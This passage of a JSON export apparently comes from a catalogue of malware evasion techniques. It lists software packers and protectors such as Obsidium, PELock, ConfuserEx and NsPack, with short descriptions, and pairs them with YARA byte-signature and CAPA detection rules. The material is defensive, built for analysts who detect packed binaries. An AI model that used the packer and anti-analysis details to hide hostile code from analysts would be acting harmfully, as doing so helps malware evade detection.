?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1354_Obsidium_Software_SignByfly_200800207: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 
64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 5B 28 00 00 }\r\n        $b = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1322_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1331_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 
33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1300_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v10059_Final: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AF }\r\n        $b = { E8 AB 1C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }\r\n        $b = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v1331_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 
50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1311_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software_: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1337_20070623_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00 }\r\n        $b = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Softwarenbsp_nbsp_SignByfly_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? 
?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1250_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13021_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 201,
            "unprotect_id": "U1420",
            "name": "AxProtector",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "AxProtector encrypts the complete software you aim to protect, and shields it with a security shell, AxEngine. Best-of-breed anti-debugging and anti-disassembly methods are then injected into your software.",
            "resources": "https://www.wibu.com/us/products/protection-suite/axprotector.html",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 200,
            "unprotect_id": "U1419",
            "name": "PELock",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "PELock is a software security solution designed for the protection of any 32-bit Windows application against cracking, tampering and reverse-engineering analysis.",
            "resources": "https://www.pelock.com/products/pelock",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 114,
                    "key": "yara_detect_pelock",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Pelock",
                    "rule": "rule Pelock_10x: PEiD\r\n{\r\n    strings:\r\n        $a = { 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 4B 45 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCKnt_204: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCKnt_204_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCknt_201: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD 20 EB 60 EB 03 CD 20 03 E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 04 CD EB 03 CD EB 02 CD 20 EB 03 CD 20 EA FC EB 03 CD 20 69 E8 00 00 00 00 EB 02 EB 01 EB 01 EB 5E EB 03 CD 20 EB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCknt_203: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 C7 85 1E EB 03 CD 20 C7 9C EB 02 69 B1 60 EB 02 EB 01 EB 01 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 01 EB EB 02 CD 20 EB 03 CD 20 EB FC EB 02 C7 85 E8 00 00 00 00 EB 03 CD 20 EA 5E EB 03 CD 20 69 0F 01 4E F4 EB 03 CD 20 EB EB 01 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCknt_202: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD 20 60 EB 03 CD 20 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 04 CD 20 EB 02 EB 02 CD 20 EB 03 CD 20 EA FC EB 03 CD 20 69 E8 00 00 00 00 EB 02 EB 01 EB 01 EB 5E EB 02 CD 20 0F 01 4E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 199,
            "unprotect_id": "U1418",
            "name": "hXOR Packer",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "hXOR Packer is a PE (Portable Executable) packer with Huffman compression and XOR encryption.\r\n\r\nThe unpacker will decompress and decrypt the packed PE and execute it directly from memory without needing any hard disk space to execute.",
            "resources": "https://github.com/fscene8/hXOR-Packer",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 198,
            "unprotect_id": "U1417",
            "name": "ConfuserEx",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "ConfuserEx is an open-source protector for .NET applications. It is the successor of the Confuser project.\r\n\r\n- Supports .NET Framework 2.0/3.0/3.5/4.0/4.5/4.6/4.7/4.8\r\n\r\n- Symbol renaming (Support WPF/BAML)\r\n\r\n- Protection against debuggers/profilers\r\n\r\n- Protection against memory dumping\r\n\r\n- Protection against tampering (method encryption)\r\n\r\n- Control flow obfuscation\r\n\r\n- Constant/resources encryption\r\n\r\n- Reference hiding proxies\r\n\r\n- Disable decompilers\r\n\r\n- Embedding dependency\r\n\r\n- Compressing output",
            "resources": "https://github.com/mkaring/ConfuserEx",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 101,
                    "key": "capa_detect_confuser",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_Confuser",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with Confuser\r\n    namespace: anti-analysis/packer/confuser\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing::Confuser [F0001.009]\r\n    examples:\r\n      - b9f5bd514485fb06da39beff051b9fdc\r\n  features:\r\n    - or:\r\n      - string: \"ConfusedByAttribute\""
                }
            ]
        },
        {
            "id": 197,
            "unprotect_id": "U1416",
            "name": "NsPack",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "NsPack is a packer for 32-bit and 64-bit Windows programs (exe, dll, ocx, scr).",
            "resources": "https://www.sans.org/white-papers/33428/",
            "tags": "NsPack",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 96,
                    "key": "capa_detect_nspack",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_NSpack",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with nspack\r\n    namespace: anti-analysis/packer/nspack\r\n    authors:\r\n      - \"@_re_fox\"\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing [F0001]\r\n    references:\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 02179f3ba93663074740b5c0d283bae2\r\n  features:\r\n    - or:\r\n      - section: .nsp0\r\n      - section: .nsp1\r\n      - section: .nsp2"
                },
                {
                    "id": 113,
                    "key": "yara_detect_nspack",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_nspack",
                    "rule": "rule NsPacK_V33_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 BD ?? ?? ?? ?? 01 AD 54 3A 40 ?? FF B5 50 3A 40 ?? 6A 40 FF 95 88 3A 40 ?? 50 50 2D ?? ?? ?? ?? 89 85 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V31_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V30_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_34_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? 
FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_V14_LiuXingPing_: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V25_V26_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_29_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_v37_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 8D ?? ?? ?? FF 80 39 01 0F 84 42 02 00 00 C6 01 01 8B C5 2B 85 ?? ?? ?? FF 89 85 ?? ?? ?? FF 01 85 ?? ?? ?? FF 8D B5 ?? ?? ?? 
FF 01 06 55 56 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? ?? FF 85 C0 0F 84 69 03 00 00 89 85 ?? ?? ?? FF E8 00 00 00 00 5B B9 67 03 00 00 03 D9 50 53 E8 B0 02 00 00 5E 5D 8B 36 8B FD 03 BD ?? ?? ?? FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 34 01 13 8B 33 03 7B 04 57 51 53 FF B5 ?? ?? ?? FF FF B5 ?? ?? ?? FF 8B D6 8B CF 8B 85 ?? ?? ?? FF 05 AA 05 00 00 FF D0 5B 59 5F 83 F9 00 74 05 83 C3 08 EB C7 68 00 80 00 00 6A 00 FF B5 ?? ?? ?? FF FF 95 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 00 74 14 8A 1A 38 1F 75 E9 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 EB 0A 8A 5F 04 86 C4 C1 C0 10 86 C4 2B C7 03 C6 89 07 83 C7 05 80 EB E8 8B C3 E2 C6 E8 3A 01 00 00 8D 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? 
FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPacK_V36_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_by_North_Star_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V27_V35_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 54 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v23_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_Liuxingping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v37_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 8D ?? ?? ?? FF 80 39 01 0F 84 42 02 00 00 C6 01 01 8B C5 2B 85 ?? ?? ?? FF 89 85 ?? ?? ?? FF 01 85 ?? ?? ?? FF 8D B5 ?? ?? ?? 
